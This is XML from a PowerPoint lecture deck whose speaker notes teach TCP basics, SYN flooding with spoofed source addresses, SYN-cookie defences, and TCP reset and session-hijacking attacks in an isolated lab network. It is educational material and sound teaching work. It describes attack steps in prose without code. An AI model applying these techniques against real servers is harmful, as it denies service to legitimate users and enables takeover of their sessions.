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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256"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280" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="313" r:id="rId24"/>
    <p:sldId id="287" r:id="rId25"/>
    <p:sldId id="288" r:id="rId26"/>
    <p:sldId id="289" r:id="rId27"/>
    <p:sldId id="314" r:id="rId28"/>
    <p:sldId id="315" r:id="rId29"/>
    <p:sldId id="305" r:id="rId30"/>
    <p:sldId id="309" r:id="rId31"/>
    <p:sldId id="308" r:id="rId32"/>
    <p:sldId id="306" r:id="rId33"/>
    <p:sldId id="307"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YPTO" initials="C" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="CRYP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29" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="1210"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8785720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1711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Now if an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> attacker sends a lot of SYN packets to the server but do not answer the SYN-ACK packets, then TCB records might make the SYN queue full quickly. In this case, if a new client sends a SYN packet to server, the server will not answer it as there is no space to store this client’s TCB record. In the client’s view point, the server is unavailable. That is the denial of service.  By the attacker not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>snwering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> SYN-ACK packet, we implicitly assume that the source IP in the attacking SYN packet is the attacker’s IP address. This is certainly not good as it can be easily blocked by a firewall at the server.  Practically, the attacking SYN packet actually uses random source IP address. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366237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813569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In our experiment, we created a subnet 10.9.0.0/24.  It contains a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> victim server 10.9.0.5 and an attacker 10.9.0.1 and two legal users 10.9.0.6 and 10.9.0.7. We will target on telnet server at 10.9.0.5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> flooding attack is not a new attack. It already has counter-measure.  In Ubuntu, the counter-measure has been implemented.  So before our attack, we need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>distable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> this counter measure. This is done by setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>syncookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> bit in server to 0.  Our C program attack is done using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>synflood.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> . This program keeps creating random SYN packets sending to the server.  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1423365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Now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> if you telnet from user machine 10.9.0.6 to the server, it will fail.  Then, if you check the server TCP connection status, you will find that there are a lot of SYN_RECVs status for the telnet server. These are the half-open connections.  We use the word counter command to check the number of connections, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0"/>
              <a:t>it is 97. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2619404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42832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The program first generates a SYN packet using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>iph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> header, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>tcph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> header and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>pkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> that combines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>iph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>tcph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t>, to be  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> packet.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0"/>
              <a:t>While</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>-loop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> generates random source IP, source port # and random </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> #. This sends a lot of SYN packets. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3098231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The SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> flooding attack makes use of the limited size for SYN queue. The counter measure is going to remove the SYN queue. That means now the server will not store any client state. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2856452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5331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But if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> the server does not store any client information, then the client can just send a ACK to the server. The server has to accept it because it is possible that the client already sent SYN packet while the server can not verify this.  This makes the protocol is still vulnerable., because the attacker can just send a lot of ACK to the server and the server has to allocate a socket with some space (that is intended to communicate with the  client who does not exist).  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1690874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To avoid the problem, the server in fact generates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> y using hash function on a secret key K and the TCB record (without y), where K is only known to server. Now when the client returns a ACK to server, server can extract the TCB record from ACK and compute the hash value H(K, TCB) and compare with y extracted from ACK.  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217653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23053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Now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> if the attacker only sends ACK to the server, he must compute y=H(K, TCB) in order to pass the verification. But this is impossible, as only the server knows K.  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1896303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There is one more way to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>disconnec</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281107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30297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In this program, to create a response packet, the source/destination IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> are swapped and source/destination port # are swapped too.  The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> # in the response packet is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>ack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> # in the receiving packet.  When you sniff, you need to sniff the subnet of 10.9.0.0/24 (on the attacker VM, this is to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0" err="1"/>
              <a:t>iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0"/>
              <a:t>-xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t>). Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> to see this interface.  Usually, you can sniff a particular protocol, port, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> address, this is what specified in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0" err="1"/>
              <a:t>MyFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" baseline="0" dirty="0"/>
              <a:t> v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t>ariable. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4236090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Hijacking attack is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0" err="1"/>
              <a:t>techinically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> similar to reset attack. In reset attack, you send a reply TCP packet with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>flagbit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> R. In Hijacking attack, you send a reply TCP packet with some message.  To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>Hijiacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> Telnet, this message is a certain telnet command.  So the attack behaviour in the attacker program is similar. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>As</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> for the reset attack, you need to make sure the four-tuple should be correct.  The sequence # should not be too large or too small; otherwise, it will be rejected. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2419501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To make sure it not too large, </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311657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lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1673137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95898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5647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268357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You</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> can think </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> attack as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0"/>
              <a:t>counterpart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> of Ambassador bridge blockade in the computer network scenario.  In this setting,  attacker sends a lot of packets to a server in a short time, render the server is inaccessible to  a legal user.  In this work, we will focus on a specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> attack called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> flooding attack. You will learn the technical details of the attacker. You will perform the detailed attacks using c and python programs respectively. You will also learn the counter measure for this attack.  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3698166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77628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21817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58708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24338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SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> flooding attack work on any TCP server.  Every TCP connection starts with a 3-way handshake protocol, which will establish the connection between client and server. The attack is going to prevent the client completing this protocol execution so that the client-server connection will never be established. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1788272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TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> transmits a TCP packet (called TCP segment), consisting of a TCP header and the data. Here is the TCP head format. It contains a source port and destination port number.  For the client-server connection, the client port # is usually randomly chosen while the server port # must be known publicly as it must be known to the client before the client can make a connection to the server.  Well-known server ports # are telnet 23, SSH 22, HTTP 80 and HTTPS 443.  The sequence number in the format is used to make sure the packets are received by the  recipient in order.  At the sender side, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>intial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> sequence  # is picked randomly.  If the current outgoing packet has a sequence # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> and the data size of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> is  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t>, then the sequence # of the next outgoing packet is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0" err="1"/>
              <a:t>s+N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" baseline="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t>   It should emphasized that due to the difference of routing paths for different packets, a packet will larger sequence number might arrive at the destination earlier than a packet with a smaller sequence  #.  But looking at the packet sequence numbers,  the receiver can restore the original packet order.  The acknowledge number. The acknowledgement number is to tell the other side the sequence # of the next packet expected. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280273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There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0"/>
              <a:t> are 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0"/>
              <a:t> bits URG, ACK, PSH, RST, SYN, FIN on TCP header. If SYN is marked as 1, then it indicates the current packet is a SYN packet, which is the first packet between client and server. The server then replies with a SYN-ACK packet, in which SYN and ACK bits are both marked as 1. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399898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This is the 3-way handshake protocol.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> After the protocol execution, the connection between them is established. It should be emphasized that the initial sequence number x is chosen by client randomly and sequence y is chosen randomly by server.  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="912257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The three</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t>-way handshake protocol is between a client socket and a server socket. This server socket is called a welcome socket. All clients will establish the connection with the welcome socket.  The server socket, when receiving the SYN packet, creates a data structure TCB block to store the client state (including source/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>destion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> IP, source/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>destition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> port and sequence numbers. This TCB block will be saved a queue called SYN queue.  Then the server socket sends SYN-ACK packet to the client and waiting for the client to finish with a ACK packet. If this ACK packet indeed returns to the server. The server will move the TCB block to another queue called accept queue (which stores the TCB blocks for all clients who have completed 3-way handshake protocols).  But this is the end of  TCP establishment. The server will in fact create a new socket  to communicate with the client socket. After this the connection is established and the TCB block will be removed from accept queue.  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359514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a:t>When the server sends</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t> out SYN-ACK packet and before client returns the ACK packet, the 3-way handshake protocol is not completed and so it is called half-open connection. If an ACK packet is returned to server for long, then the server will retransmit it. After waiting for a while, if it is still not returned, then it will be retransmitted again. In SEED Ubuntu, it will has 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0" err="1"/>
              <a:t>retranmissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" baseline="0" dirty="0"/>
              <a:t>. This retransmissions make the TCB block stays in the SYN queue for long.  Since more TCB records for other clients keep coming in, this might make the queue full. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3297306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FD70A-4D6C-D8E6-3BFE-5C10C9A91A9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id="{64E962F6-4CFB-F9EA-C650-327912435C4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A1D0313-F24A-BBA1-3F3A-FE6C0924EC4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5F2FA1-7D5D-45CF-2347-BCFA111B2A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A29986-E2F5-DFB4-CE98-11FC9DD35FA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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2125773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BAE0-C899-B6DF-0024-C6FB407525F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316DA6C-3167-5649-6788-3E0FB60B9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1013681-A5D6-4061-C006-2E3C2963FC21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F643576-A214-FE11-46AA-1C316A116CA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93453A-6353-C702-434A-67ADDAC47AAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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41577442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4AF27-AE5F-4C24-F187-F121580B3EC1}"/>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8C04B0B-B2FF-CE25-82DA-D1068751DA1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5297DF-0B31-ECDE-EBD0-4BE71B65D426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC652F9E-8498-6F85-B5E0-E34EE765854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8BBCDAC-E14E-81FA-B5FF-63E5CAAEBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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480657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171800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3454-890F-3369-E11E-BD9009FA23D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272546F-4F32-32E4-A983-31DBC39C4F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FB908F-4BE7-A1E6-8FEB-EB711E780D7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A90C7EAA-AAFB-4B20-BAA6-29E9F3B07C77}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2023-10-04</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69F764A-1142-FB4B-3B23-17D76B2555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1FAB1A-FB8E-C5B1-07C8-F8EC5E8337D0}"/>
              </a:ext>
            </a:extLst>
